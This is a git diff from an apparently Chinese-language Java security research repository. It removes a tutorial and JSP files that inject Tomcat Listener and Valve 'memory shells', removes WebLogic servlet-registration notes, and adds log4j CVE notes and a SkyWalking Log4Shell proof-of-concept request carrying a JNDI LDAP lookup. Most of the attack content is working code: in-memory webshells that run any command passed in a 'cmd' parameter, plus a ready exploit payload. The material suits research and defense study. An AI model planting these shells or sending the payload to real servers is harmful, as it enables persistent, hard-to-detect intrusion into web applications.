stdctx.get(applicationContext); -> ``` - -step3-调用addApplicationEventListener()动态添加Listener - -> ```java -> ListenerDemo SRL = new ListenerDemo(); -> standardContext.addApplicationEventListener(SRL); -> out.println("listener shell inject success"); -> ``` - -代码整合如下 - -> ```jsp -> <%@ page import="java.lang.reflect.Field" %> -> <%@ page import="org.apache.catalina.core.ApplicationContext" %> -> <%@ page import="org.apache.catalina.core.StandardContext" %> -> <%@ page import="java.io.IOException" %> -> <%@ page import="org.apache.catalina.connector.Request" %> -> <% -> class ListenerDemo implements ServletRequestListener { -> @Override -> public void requestInitialized(ServletRequestEvent sre) { -> HttpServletRequest req = (HttpServletRequest) sre.getServletRequest(); -> String cmd = sre.getServletRequest().getParameter("cmd"); -> try { -> if (cmd != null) { -> Process process = Runtime.getRuntime().exec(cmd); -> java.io.BufferedReader bufferedReader = new java.io.BufferedReader(new java.io.InputStreamReader(process.getInputStream())); -> Field requestF = req.getClass().getDeclaredField("request"); -> requestF.setAccessible(true); -> Request request = (Request) requestF.get(req); -> StringBuilder stringBuilder = new StringBuilder(); -> String line; -> while ((line = bufferedReader.readLine()) != null) { -> stringBuilder.append(line + '\n'); -> } -> request.getResponse().getOutputStream().write(stringBuilder.toString().getBytes()); -> request.getResponse().getOutputStream().flush(); -> request.getResponse().getOutputStream().close(); -> } -> } catch (NoSuchFieldException | IllegalAccessException | IOException e) { -> e.printStackTrace(); -> } -> } -> -> @Override -> public void requestDestroyed(ServletRequestEvent sre) { -> -> } -> } -> %> -> <% -> ServletContext servletContext = request.getServletContext(); -> Field appctx = servletContext.getClass().getDeclaredField("context"); -> appctx.setAccessible(true); -> ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext); -> Field stdctx = applicationContext.getClass().getDeclaredField("context"); -> stdctx.setAccessible(true); -> StandardContext standardContext = (StandardContext) stdctx.get(applicationContext); -> ListenerDemo SRL = new ListenerDemo(); -> standardContext.addApplicationEventListener(SRL); -> out.println("listener shell inject success"); -> %> -> ``` -测试效果 - -![image](https://user-images.githubusercontent.com/55024146/144616650-c6a9df8f-36ed-4063-9874-eb7a82b7a27c.png) - - -### Valve 内存马 - -Tomcat内部Valve组件,与Filter, Interceptor这些概念类似.只不过Valve是针对Tomcat内部的,而Filter是Servlet的标准, Interceptor是基于框架层次上的.但是它们的工作方式都是一种责任链的传递来拦截Request, Response,然后进行自定义的处理。所以这里的valve型内存马也和之前的差不多,自定义一个含有恶意代码处理逻辑的valve接口的实现或valve接口实现类的继承,然后通过tomcat自带的机制添加即可。 - -#### 静态添加 valve - -首先自定义可执行cmd的valve,实现Valve接口并重写其成员方法,核心代码块在invoke方法里 - -> EvilValve.java -> -> ```java -> package com.example.tomcat8; -> -> import org.apache.catalina.Valve; -> import org.apache.catalina.connector.Request; -> import org.apache.catalina.connector.Response; -> -> import javax.servlet.ServletException; -> import java.io.IOException; -> -> public class EvilValve implements Valve{ -> @Override -> public Valve getNext() { -> return null; -> } -> -> @Override -> public void setNext(Valve valve) { -> -> } -> -> @Override -> public void backgroundProcess() { -> -> } -> -> @Override -> public void invoke(Request request, Response response) throws IOException, ServletException { -> String cmd = request.getParameter("cmd"); -> if (cmd != null) { -> Process process = Runtime.getRuntime().exec(cmd); -> java.io.BufferedReader bufferedReader = new java.io.BufferedReader( -> new java.io.InputStreamReader(process.getInputStream()) -> ); -> StringBuilder stringBuilder = new StringBuilder(); -> String line; -> while ((line = bufferedReader.readLine()) != null) { -> stringBuilder.append(line + '\n'); -> } -> response.getOutputStream().write(stringBuilder.toString().getBytes()); -> response.getOutputStream().flush(); -> response.getOutputStream().close(); -> getNext().invoke(request, response); -> }else { -> getNext().invoke(request, response); -> } -> } -> -> @Override -> public boolean isAsyncSupported() { -> return false; -> } -> } -> ``` - - - - -E:\Tomcat\apache-tomcat-8.5.70\conf\server.xml - -> ```xml -> -> ``` - -![image](https://user-images.githubusercontent.com/55024146/144636239-f0758eb1-7698-44ba-92fe-cd7c2cd575f8.png) - - -测试失败-报错如下 - - 卡了很久没能解决,放弃 - - -![image](https://user-images.githubusercontent.com/55024146/144635943-a7fd98c0-ea60-4fe9-874d-d40e5f41caa7.png) - -#### 动态添加 valve - -- org.apache.catalina.core.ContainerBase#addValve - - -![image](https://user-images.githubusercontent.com/55024146/144636017-6411e9c5-0e51-43e0-b989-27889acc3a1e.png) - -- org.apache.catalina.core.ContainerBase#pipeline - - -![image](https://user-images.githubusercontent.com/55024146/144636054-a6a6d624-038e-48aa-8f50-dc54cd3b445f.png) - -- org.apache.catalina.core.ContainerBase#getPipeline - -![image](https://user-images.githubusercontent.com/55024146/144636096-27ca076f-0b72-4b5b-bf78-ee75d3934157.png) - - -捋清思路 - -- 自定义valve -> 实现valve接口,重写invoke方法 -- 添加valve -> this.pipeline.addValve(valve) -- 获取this.pipeline -> ContainerBase#getPipeline -- 调用getPipeline -> 继承ContainerBase类 -- ContainerBase类 -> `public class StandardContext extends ContainerBase implements...` -- 获取StandardContext - -代码实现 - -```java -ServletContext servletContext = request.getSession().getServletContext(); -Field appctx = servletContext.getClass().getDeclaredField("context"); -appctx.setAccessible(true); -ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext); -Field stdctx = applicationContext.getClass().getDeclaredField("context"); -stdctx.setAccessible(true); -StandardContext standardContext = (StandardContext) stdctx.get(applicationContext); -standardContext.getPipeline().addValve(evilValve); -``` - -代码整合如下 - -> ```jsp -> <%@ page import="java.io.IOException" %> -> <%@ page import="java.lang.reflect.Field" %> -> <%@ page import="org.apache.catalina.core.ApplicationContext" %> -> <%@ page import="org.apache.catalina.core.StandardContext" %> -> <%@ page import="org.apache.catalina.connector.Request" %> -> <%@ page import="org.apache.catalina.connector.Response" %> -> <%@ page import="org.apache.catalina.Valve" %> -> <%@ page contentType="text/html;charset=UTF-8" language="java" %> -> <% -> class EvilValve implements Valve { -> @Override -> public Valve getNext() { -> return null; -> } -> @Override -> public void setNext(Valve valve) { -> -> } -> @Override -> public void backgroundProcess() { -> -> } -> @Override -> public void invoke(Request request, Response response) throws IOException, ServletException { -> String cmd = request.getParameter("cmd"); -> if (cmd != null) { -> Process process = Runtime.getRuntime().exec(cmd); -> java.io.BufferedReader bufferedReader = new java.io.BufferedReader( -> new java.io.InputStreamReader(process.getInputStream()) -> ); -> StringBuilder stringBuilder = new StringBuilder(); -> String line; -> while ((line = bufferedReader.readLine()) != null) { -> stringBuilder.append(line + '\n'); -> } -> response.getOutputStream().write(stringBuilder.toString().getBytes()); -> response.getOutputStream().flush(); -> response.getOutputStream().close(); -> getNext().invoke(request, response); -> }else { -> getNext().invoke(request, response); -> } -> } -> @Override -> public boolean isAsyncSupported() { -> return false; -> } -> } -> %> -> -> <% -> /** -> * 已测试:tomcat8 -> */ -> try{ -> ServletContext servletContext = request.getSession().getServletContext(); -> Field appctx = servletContext.getClass().getDeclaredField("context"); -> appctx.setAccessible(true); -> ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext); -> Field stdctx; -> stdctx = applicationContext.getClass().getDeclaredField("context"); -> stdctx.setAccessible(true); -> StandardContext standardContext; -> standardContext = (StandardContext) stdctx.get(applicationContext); -> Valve evilValve = new EvilValve(); -> standardContext.getPipeline().addValve(evilValve); -> out.println("valve shell inject success"); -> } catch (NoSuchFieldException | IllegalAccessException e) { -> e.printStackTrace(); -> } -> %> -> ``` - -测试效果 - -![image](https://user-images.githubusercontent.com/55024146/144636520-2d377082-7756-4214-94bb-7dfad4383258.png) - - - - - - - diff --git a/fileless-shell/tomcat/addListener.jsp b/fileless-shell/tomcat/addListener.jsp deleted file mode 100644 index 4c450905..00000000 --- a/fileless-shell/tomcat/addListener.jsp +++ /dev/null @@ -1,55 +0,0 @@ -<%@ page contentType="text/html;charset=UTF-8" language="java" %> -<%@ page import="org.apache.catalina.core.ApplicationContext" %> -<%@ page import="org.apache.catalina.core.StandardContext" %> -<%@ page import="javax.servlet.*" %> -<%@ page import="java.io.IOException" %> -<%@ page import="java.lang.reflect.Field" %> -<%@ page import="java.io.InputStream" %> -<%@ page import="org.apache.catalina.connector.Request" %> -<%@ page import="java.util.Scanner" %> - -<% - class SRL implements ServletRequestListener{ - @Override - public void requestDestroyed(ServletRequestEvent servletRequestEvent) { - - } - @Override - public void requestInitialized(ServletRequestEvent sre) { - try { - InputStream in = java.lang.Runtime.getRuntime().exec(new String[]{"cmd.exe", "/c", sre.getServletRequest().getParameter("cmd")}).getInputStream(); - // getField和getDeclaredField都是Class类的方法,反射成员变量时使用,这里返回一個Field對象 - // getDeclaredFiled 仅能获取类本身的属性成员(包括私有、共有、保护) - // getField 仅能获取类 public属性成员 - Field requestF = sre.getServletRequest().getClass().getDeclaredField("request"); - // 成员变量为private,必须进行此操作。 - // accessible 标志被设置为true,那么反射对象在使用的时候,不会去检查Java语言权限控制(private之类的); - // 如果设置为false,反射对象在使用的时候,会检查Java语言权限控制。 - requestF.setAccessible(true); - Request request = (Request)requestF.get(sre.getServletRequest()); - Scanner s = new Scanner( in ).useDelimiter("\\a"); - String o = s.hasNext() ? s.next() : ""; - request.getResponse().getWriter().write(o); - request.getResponse().getWriter().flush(); - request.getResponse().getWriter().close(); - } catch (IOException | IllegalAccessException | NoSuchFieldException e) { - e.printStackTrace(); - } - } - } -%> - -<% - // 通过反射获取获取context部分 - ServletContext servletContext = request.getSession().getServletContext(); - Field appctx = servletContext.getClass().getDeclaredField("context"); - appctx.setAccessible(true); - ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext); - Field stdctx = applicationContext.getClass().getDeclaredField("context"); - stdctx.setAccessible(true); - StandardContext standardContext = (StandardContext) stdctx.get(applicationContext); - // 添加Listener - SRL servletRequestListener = new SRL(); - standardContext.addApplicationEventListener(servletRequestListener); - out.println("listener shell inject success"); -%> \ No newline at end of file diff --git a/fileless-shell/tomcat/addValve.jsp b/fileless-shell/tomcat/addValve.jsp deleted file mode 100644 index 359d48d3..00000000 --- a/fileless-shell/tomcat/addValve.jsp +++ /dev/null @@ -1,71 +0,0 @@ -<%@ page import="java.io.IOException" %> -<%@ page import="java.lang.reflect.Field" %> -<%@ page import="org.apache.catalina.core.ApplicationContext" %> -<%@ page import="org.apache.catalina.core.StandardContext" %> -<%@ page import="org.apache.catalina.connector.Request" %> -<%@ page import="org.apache.catalina.connector.Response" %> -<%@ page import="org.apache.catalina.Valve" %> -<%@ page contentType="text/html;charset=UTF-8" language="java" %> -<% - class EvilValve implements Valve { - @Override - public Valve getNext() { - return null; - } - @Override - public void setNext(Valve valve) { - - } - @Override - public void backgroundProcess() { - - } - @Override - public void invoke(Request request, Response response) throws IOException, ServletException { - String cmd = request.getParameter("cmd"); - if (cmd != null) { - Process process = Runtime.getRuntime().exec(cmd); - java.io.BufferedReader bufferedReader = new java.io.BufferedReader( - new java.io.InputStreamReader(process.getInputStream()) - ); - StringBuilder stringBuilder = new StringBuilder(); - String line; - while ((line = bufferedReader.readLine()) != null) { - stringBuilder.append(line + '\n'); - } - response.getOutputStream().write(stringBuilder.toString().getBytes()); - response.getOutputStream().flush(); - response.getOutputStream().close(); - getNext().invoke(request, response); - }else { - getNext().invoke(request, response); - } - } - @Override - public boolean isAsyncSupported() { - return false; - } - } -%> - -<% - /** - * 已测试:tomcat8 - */ - try{ - ServletContext servletContext = request.getSession().getServletContext(); - Field appctx = servletContext.getClass().getDeclaredField("context"); - appctx.setAccessible(true); - ApplicationContext applicationContext = (ApplicationContext) appctx.get(servletContext); - Field stdctx; - stdctx = applicationContext.getClass().getDeclaredField("context"); - stdctx.setAccessible(true); - StandardContext standardContext; - standardContext = (StandardContext) stdctx.get(applicationContext); - Valve evilValve = new EvilValve(); - standardContext.getPipeline().addValve(evilValve); - out.println("valve shell inject success"); - } catch (NoSuchFieldException | IllegalAccessException e) { - e.printStackTrace(); - } -%> \ No newline at end of file diff --git a/fileless-shell/weblogic/README.md b/fileless-shell/weblogic/README.md deleted file mode 100644 index 43138e8d..00000000 --- a/fileless-shell/weblogic/README.md +++ /dev/null @@ -1,106 +0,0 @@ -**目录** -- 获取上下文 WebAppServletContext -- 动态注册Servlet内存马 -- 动态注册Listener内存马 -- 动态注册Filter内存马 - -> 已测试10.3.6.0、12.1.3.0.0 - - -### 获取上下文 WebAppServletContext - -- WebAppServletContext - -```java -Class executeThread = Class.forName("weblogic.work.ExecuteThread"); -Method getCurrentWork = executeThread.getDeclaredMethod("getCurrentWork"); -Object currentWork = getCurrentWork.invoke(Thread.currentThread()); -WebAppServletContext webAppServletContext; -try { - // weblogic 12.1.3 - Field connectionHandler = currentWork.getClass().getDeclaredField("connectionHandler"); - connectionHandler.setAccessible(true); - Object httpConnectionHandler = connectionHandler.get(currentWork); - Field requestF = httpConnectionHandler.getClass().getDeclaredField("request"); - requestF.setAccessible(true); - httpConnectionHandler = requestF.get(httpConnectionHandler); - java.lang.reflect.Field contextF = httpConnectionHandler.getClass().getDeclaredField("context"); - contextF.setAccessible(true); - webAppServletContext = (WebAppServletContext) contextF.get(httpConnectionHandler); -} catch (Exception e) { - // weblogic 1036 - Field contextF = currentWork.getClass().getDeclaredField("context"); - contextF.setAccessible(true); - webAppServletContext = (WebAppServletContext) contextF.get(currentWork); -} -``` - -### 动态注册Servlet内存马 - -跟了一下从web.xml添加servet的流程,可以使用registerServlet方法注册Servlet,不过不同版本的weblogic对该方法有不同实现: - -#### 10.3.6.0 -![image](https://user-images.githubusercontent.com/55024146/143993515-f149070e-9ea0-487b-8dbf-fcb8f1682fcd.png) - - -成员方法 -- weblogic.servlet.internal.WebAppServletContext#registerServlet() - -![image](https://user-images.githubusercontent.com/55024146/143996030-4614d0d7-e77f-47e6-8540-ec40f41dc296.png) - - - -反射调用 -```java -Method registerServlet = webAppServletContext.getClass().getDeclaredMethod("registerServlet", String.class, String.class, String.class, Map.class); -registerServlet.setAccessible(true); -HashMap hashMap = new HashMap(); -registerServlet.invoke(webAppServletContext, "TestServlet", "/abcd", servletClass.getName(), hashMap); -``` -测试效果 - -![image](https://user-images.githubusercontent.com/55024146/143996228-773c6cf8-c801-4068-bcd9-8ce03e016de2.png) - - -#### 12.1.3.0.0 - -成员方法 -- weblogic.servlet.internal.WebAppServletContext#registerServlet() -![image](https://user-images.githubusercontent.com/55024146/143996176-db4ea7f0-568b-492e-b20a-07ef8727f29c.png) - - -同样的,反射调用 - -```java -Method registerServlet = webAppServletContext.getClass().getDeclaredMethod("registerServlet", String.class, String.class, String.class); -registerServlet.setAccessible(true); -registerServlet.invoke(webAppServletContext, "TestServlet", "/121300", servletClass.getName()); -response.getWriter().write("Servlet Injected Successfully!!!"); -``` - -测试效果 - -![image](https://user-images.githubusercontent.com/55024146/143996258-5aef7689-b745-4273-95b8-e2f74776bb01.png) - - - -### 动态注册Listener内存马 - - -### 动态注册Filter内存马 - -#### 10.3.6.0 - -测试效果 - -![image](https://user-images.githubusercontent.com/55024146/144036760-4c29b12c-2b28-4270-a82b-7c812e2f7922.png) - - - -#### 12.1.3.0.0 - -测试效果 - -![image](https://user-images.githubusercontent.com/55024146/144036974-997a4c40-c302-4c21-8770-e8581b6a9104.png) - - diff --git a/framework/log/log4j1/CVE-2019-17571.md b/framework/log/log4j1/CVE-2019-17571.md new file mode 100644 index 00000000..f7bc18cd --- /dev/null +++ b/framework/log/log4j1/CVE-2019-17571.md @@ -0,0 +1,14 @@ +**漏洞分析** + +SimpleSocketServer若开启了xxxx端口,会对socket接收的数据进行反序列化操作 + +![image](https://user-images.githubusercontent.com/55024146/165814421-f6762915-25bc-4f59-b7d3-86d606e84373.png) + +测试效果 + +![image](https://user-images.githubusercontent.com/55024146/165814599-c09f968b-c9aa-4719-ab2a-12ed283049c6.png) + +**漏洞验证** + +![image](https://user-images.githubusercontent.com/55024146/165814894-ebe9a146-8d59-4912-a059-00acb21f570e.png) + diff --git a/framework/log/log4j1/CVE-2022-23307.md b/framework/log/log4j1/CVE-2022-23307.md new file mode 100644 index 00000000..fe6ef724 --- /dev/null +++ b/framework/log/log4j1/CVE-2022-23307.md @@ -0,0 +1,14 @@ +**漏洞分析** + +设置监听端口 + +![image](https://user-images.githubusercontent.com/55024146/165812050-49b13eb6-d3b7-47b3-9ca3-906c19891226.png) + +然后使用 LoggingReceiver 处理相关连接信息,反序列化ois对象时触发漏洞 + +![image](https://user-images.githubusercontent.com/55024146/165812417-bc91774f-4916-42e6-89e0-bf1e6959870c.png) + + +**漏洞验证** + +![image](https://user-images.githubusercontent.com/55024146/165812930-73c69adf-7dab-4556-b894-cc64fe056818.png) diff --git a/framework/log/log4j1/README.md b/framework/log/log4j1/README.md new file mode 100644 index 00000000..6d9d7869 --- /dev/null +++ b/framework/log/log4j1/README.md @@ -0,0 +1,5 @@ +历史漏洞 + +- [x] [CVE-2019-17571 SocketServer RCE](CVE-2019-17571.md) +- [x] [CVE-2022-23307 Chainsaw RCE](CVE-2022-23307.md) + diff --git a/framework/log/log4j2/CVE-2021-44228.md b/framework/log/log4j2/CVE-2021-44228.md new file mode 100644 index 00000000..c40a2642 --- /dev/null +++ b/framework/log/log4j2/CVE-2021-44228.md @@ -0,0 +1,11 @@ +### CVE-2021-44228 Log4Shell + +漏洞复现 + +起一个恶意的LDAPRefServer、恶意类Evil + +![image](https://user-images.githubusercontent.com/55024146/165895658-d4eea680-015a-411f-96c7-2384fa08d462.png) + +然后触发即可 + +![image](https://user-images.githubusercontent.com/55024146/165895677-ab26a7bb-69a3-4504-9156-7aade555ea07.png) diff --git a/framework/log/log4j2/README.md b/framework/log/log4j2/README.md new file mode 100644 index 00000000..e32b54bb --- /dev/null +++ b/framework/log/log4j2/README.md @@ -0,0 +1,3 @@ +历史漏洞 + +- [x] [CVE-2021-44228 JNDI -> RCE](CVE-2021-44228.md) \ No newline at end of file diff --git "a/framework/log/logback/345円210円251円347円224円250円347円240円224円347円251円266円.md" "b/framework/log/logback/345円210円251円347円224円250円347円240円224円347円251円266円.md" new file mode 100644 index 00000000..b48e1610 --- /dev/null +++ "b/framework/log/logback/345円210円251円347円224円250円347円240円224円347円251円266円.md" @@ -0,0 +1,2 @@ + +- https://mp.weixin.qq.com/s/OBwxaijYCjnvo8I0OBusug diff --git a/framework/microservice/dropwizard/README.md b/framework/microservice/dropwizard/README.md new file mode 100644 index 00000000..df2ad99a --- /dev/null +++ b/framework/microservice/dropwizard/README.md @@ -0,0 +1,26 @@ +Dropwizard self-validating feature enabling attackers to inject arbitrary Java EL expressions, leading to RCE vulnerability. + +vulnerable code snippet +```java +// com.example.helloworld.core.Person#validateFullName + +@SelfValidation +public void validateFullName(ViolationCollector col) { + if (fullName.contains("$")) { + col.addViolation("Full name contains invalid characters: " + fullName); + } +} + +// io.dropwizard.validation.selfvalidating.ViolationCollector#addViolation +public void addViolation(String msg) { + this.violationOccurred = true; + this.context.buildConstraintViolationWithTemplate(msg).addConstraintViolation(); +} + +``` + + +issue reproduction + + +image diff --git a/framework/microservice/flink/README.md b/framework/microservice/flink/README.md new file mode 100644 index 00000000..62a5f718 --- /dev/null +++ b/framework/microservice/flink/README.md @@ -0,0 +1,5 @@ +历史漏洞 + +- [x] [CVE-2020-17518 文件上传](https://mp.weixin.qq.com/s/Wtcm8AFM5HrPOZ1tA0oHMg) +- [x] [CVE-2020-17519 文件读取](https://mp.weixin.qq.com/s/Wtcm8AFM5HrPOZ1tA0oHMg) + diff --git a/framework/microservice/jenkins/README.md b/framework/microservice/jenkins/README.md new file mode 100644 index 00000000..ac086451 --- /dev/null +++ b/framework/microservice/jenkins/README.md @@ -0,0 +1,6 @@ +相关漏洞 +--- + +### CVE-2015-8103 反序列化 -> RCE + +- https://mp.weixin.qq.com/s/g91wUz8QaOz7qvQodIO5UQ diff --git a/framework/microservice/shenyu/README.md b/framework/microservice/shenyu/README.md new file mode 100644 index 00000000..eb953af2 --- /dev/null +++ b/framework/microservice/shenyu/README.md @@ -0,0 +1,11 @@ +相关漏洞 +--- + +### CVE-2021-45029 Groovy & SpEL Injection + +- https://mp.weixin.qq.com/s/SdNLthm5Ll3SnRhO0dGGgA + +### CVE-2021-37580 Auth bypass + +- https://mp.weixin.qq.com/s/LwpXJPFIjZkwXcMl8KU2fw + diff --git a/framework/microservice/skywalking/README.md b/framework/microservice/skywalking/README.md new file mode 100644 index 00000000..1fdaccce --- /dev/null +++ b/framework/microservice/skywalking/README.md @@ -0,0 +1,242 @@ +## 相关漏洞 + +### CVE-2021-44228 RCE via Log4Shell + +#### 漏洞描述 + +#### 漏洞复现 + +##### 环境搭建 + +- https://www.apache.org/dyn/closer.cgi/skywalking/8.3.0/apache-skywalking-apm-8.3.0.tar.gz + +下载后 + +``` +./sudo ./startup.sh +``` + +![image-20220113144942928](skywalking.assets/image-20220113144942928.png) + +如图 + +![image-20220113145030966](skywalking.assets/image-20220113145030966.png) + +注:内置中间件 + +- Powered by Jetty:// 9.4.28.v20200408 + +##### 漏洞验证 + +###### DNSLog + +proof of concept + +```shell +POST /graphql HTTP/1.1 +Host: 10.10.10.139:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0 +Accept: application/json, text/plain, */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Content-Type: application/json;charset=utf-8 +Content-Length: 444 +Origin: http://10.10.10.139:8080 +DNT: 1 +Connection: close +Referer: http://10.10.10.139:8080/ + +{ + "query":"query queryLogs($condition: LogQueryCondition) { + queryLogs(condition: $condition) { + total + logs { + serviceId + ${jndi:ldap://craq3a.dnslog.cn} + serviceName + isError + content + } + } +} +", + "variables":{ + "condition":{ + "metricName":"test", + "state":"ALL", + "paging":{ + "pageSize":10 + } + } + } +} +``` + + + +![image-20220113144532353](skywalking.assets/image-20220113144532353.png) + +###### 命令执行 + +![image-20220113155050988](skywalking.assets/image-20220113155050988.png) + +###### Reverse Shell + +![image-20220114152004486](skywalking.assets/image-20220114152004486.png) + +#### 漏洞分析 + +- 调试模式 + +- https://www.jianshu.com/p/e70fe8717abf + + +**log4shell-source** + +- org.apache.skywalking.oap.query.graphql.GraphQLQueryHandler#doPost + +![image-20220114140427507](skywalking.assets/image-20220114140427507.png) + + + +**log4shell-sink** + +- graphql.GraphQL#parseAndValidate + - org.slf4j.Logger#warn(java.lang.String, java.lang.Object) + +![image-20220114133448365](skywalking.assets/image-20220114133448365.png) + + + +调用栈 + +```java +parseAndValidate:507, GraphQL (graphql) +lambda$parseValidateAndExecute3ドル:494, GraphQL (graphql) +apply:-1, 361099866 (graphql.GraphQL$$Lambda138ドル) +get:11, NoOpPreparsedDocumentProvider (graphql.execution.preparsed) +parseValidateAndExecute:490, GraphQL (graphql) +executeAsync:470, GraphQL (graphql) +execute:401, GraphQL (graphql) +execute:93, GraphQLQueryHandler (org.apache.skywalking.oap.query.graphql) +doPost:83, GraphQLQueryHandler (org.apache.skywalking.oap.query.graphql) +doPost:59, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty) +service:707, HttpServlet (javax.servlet.http) +service:107, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty) +service:790, HttpServlet (javax.servlet.http) +service:112, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty) +handle:763, ServletHolder (org.eclipse.jetty.servlet) +doHandle:551, ServletHandler (org.eclipse.jetty.servlet) +nextHandle:233, ScopedHandler (org.eclipse.jetty.server.handler) +doHandle:1363, ContextHandler (org.eclipse.jetty.server.handler) +nextScope:188, ScopedHandler (org.eclipse.jetty.server.handler) +doScope:489, ServletHandler (org.eclipse.jetty.servlet) +nextScope:186, ScopedHandler (org.eclipse.jetty.server.handler) +doScope:1278, ContextHandler (org.eclipse.jetty.server.handler) +handle:141, ScopedHandler (org.eclipse.jetty.server.handler) +handle:127, HandlerWrapper (org.eclipse.jetty.server.handler) +handle:500, Server (org.eclipse.jetty.server) +lambda$handle1ドル:383, HttpChannel (org.eclipse.jetty.server) +dispatch:-1, 878842527 (org.eclipse.jetty.server.HttpChannel$$Lambda127ドル) +dispatch:547, HttpChannel (org.eclipse.jetty.server) +handle:375, HttpChannel (org.eclipse.jetty.server) +onFillable:273, HttpConnection (org.eclipse.jetty.server) +succeeded:311, AbstractConnection$ReadCallback (org.eclipse.jetty.io) +fillable:103, FillInterest (org.eclipse.jetty.io) +run:117, ChannelEndPoint2ドル (org.eclipse.jetty.io) +runJob:806, QueuedThreadPool (org.eclipse.jetty.util.thread) +run:938, QueuedThreadPool$Runner (org.eclipse.jetty.util.thread) +run:745, Thread (java.lang) +``` + + + +**jndi-sink** + +- javax.naming.spi.NamingManager#getObjectFactoryFromReference + +![image-20220114144223966](skywalking.assets/image-20220114144223966.png) + +调用栈 + +```java +# 执行无参构造方法 & 静态代码块 +newInstance:396, Class (java.lang) +getObjectFactoryFromReference:163, NamingManager (javax.naming.spi) +getObjectInstance:189, DirectoryManager (javax.naming.spi) +c_lookup:1085, LdapCtx (com.sun.jndi.ldap) +p_lookup:542, ComponentContext (com.sun.jndi.toolkit.ctx) +lookup:177, PartialCompositeContext (com.sun.jndi.toolkit.ctx) +lookup:205, GenericURLContext (com.sun.jndi.toolkit.url) +lookup:94, ldapURLContext (com.sun.jndi.url.ldap) +lookup:417, InitialContext (javax.naming) +lookup:172, JndiManager (org.apache.logging.log4j.core.net) +lookup:56, JndiLookup (org.apache.logging.log4j.core.lookup) +lookup:183, Interpolator (org.apache.logging.log4j.core.lookup) +resolveVariable:1054, StrSubstitutor (org.apache.logging.log4j.core.lookup) +substitute:976, StrSubstitutor (org.apache.logging.log4j.core.lookup) +substitute:872, StrSubstitutor (org.apache.logging.log4j.core.lookup) +replace:427, StrSubstitutor (org.apache.logging.log4j.core.lookup) +format:127, MessagePatternConverter (org.apache.logging.log4j.core.pattern) +format:38, PatternFormatter (org.apache.logging.log4j.core.pattern) +toSerializable:333, PatternLayout$PatternSerializer (org.apache.logging.log4j.core.layout) +toText:232, PatternLayout (org.apache.logging.log4j.core.layout) +encode:217, PatternLayout (org.apache.logging.log4j.core.layout) +encode:57, PatternLayout (org.apache.logging.log4j.core.layout) +directEncodeEvent:177, AbstractOutputStreamAppender (org.apache.logging.log4j.core.appender) +tryAppend:170, AbstractOutputStreamAppender (org.apache.logging.log4j.core.appender) +append:161, AbstractOutputStreamAppender (org.apache.logging.log4j.core.appender) +append:308, RollingFileAppender (org.apache.logging.log4j.core.appender) +tryCallAppender:156, AppenderControl (org.apache.logging.log4j.core.config) +callAppender0:129, AppenderControl (org.apache.logging.log4j.core.config) +callAppenderPreventRecursion:120, AppenderControl (org.apache.logging.log4j.core.config) +callAppender:84, AppenderControl (org.apache.logging.log4j.core.config) +callAppenders:448, LoggerConfig (org.apache.logging.log4j.core.config) +processLogEvent:433, LoggerConfig (org.apache.logging.log4j.core.config) +log:417, LoggerConfig (org.apache.logging.log4j.core.config) +log:403, LoggerConfig (org.apache.logging.log4j.core.config) +log:63, AwaitCompletionReliabilityStrategy (org.apache.logging.log4j.core.config) +logMessage:146, Logger (org.apache.logging.log4j.core) +tryLogMessage:2116, AbstractLogger (org.apache.logging.log4j.spi) +logMessageSafely:2100, AbstractLogger (org.apache.logging.log4j.spi) +logMessage:2011, AbstractLogger (org.apache.logging.log4j.spi) +logIfEnabled:1882, AbstractLogger (org.apache.logging.log4j.spi) +warn:244, Log4jLogger (org.apache.logging.slf4j) +parseAndValidate:507, GraphQL (graphql) +lambda$parseValidateAndExecute3ドル:494, GraphQL (graphql) +apply:-1, 361099866 (graphql.GraphQL$$Lambda138ドル) +get:11, NoOpPreparsedDocumentProvider (graphql.execution.preparsed) +parseValidateAndExecute:490, GraphQL (graphql) +executeAsync:470, GraphQL (graphql) +execute:401, GraphQL (graphql) +execute:93, GraphQLQueryHandler (org.apache.skywalking.oap.query.graphql) +doPost:83, GraphQLQueryHandler (org.apache.skywalking.oap.query.graphql) +doPost:59, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty) +service:707, HttpServlet (javax.servlet.http) +service:107, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty) +service:790, HttpServlet (javax.servlet.http) +service:112, JettyJsonHandler (org.apache.skywalking.oap.server.library.server.jetty) +handle:763, ServletHolder (org.eclipse.jetty.servlet) +doHandle:551, ServletHandler (org.eclipse.jetty.servlet) +nextHandle:233, ScopedHandler (org.eclipse.jetty.server.handler) +doHandle:1363, ContextHandler (org.eclipse.jetty.server.handler) +nextScope:188, ScopedHandler (org.eclipse.jetty.server.handler) +doScope:489, ServletHandler (org.eclipse.jetty.servlet) +nextScope:186, ScopedHandler (org.eclipse.jetty.server.handler) +doScope:1278, ContextHandler (org.eclipse.jetty.server.handler) +handle:141, ScopedHandler (org.eclipse.jetty.server.handler) +handle:127, HandlerWrapper (org.eclipse.jetty.server.handler) +handle:500, Server (org.eclipse.jetty.server) +lambda$handle1ドル:383, HttpChannel (org.eclipse.jetty.server) +dispatch:-1, 878842527 (org.eclipse.jetty.server.HttpChannel$$Lambda127ドル) +dispatch:547, HttpChannel (org.eclipse.jetty.server) +handle:375, HttpChannel (org.eclipse.jetty.server) +onFillable:273, HttpConnection (org.eclipse.jetty.server) +succeeded:311, AbstractConnection$ReadCallback (org.eclipse.jetty.io) +fillable:103, FillInterest (org.eclipse.jetty.io) +run:117, ChannelEndPoint2ドル (org.eclipse.jetty.io) +runJob:806, QueuedThreadPool (org.eclipse.jetty.util.thread) +run:938, QueuedThreadPool$Runner (org.eclipse.jetty.util.thread) +run:745, Thread (java.lang) +``` + diff --git a/framework/microservice/skywalking/skywalking.assets/image-20220113130647264.png b/framework/microservice/skywalking/skywalking.assets/image-20220113130647264.png new file mode 100644 index 00000000..68f2e20a 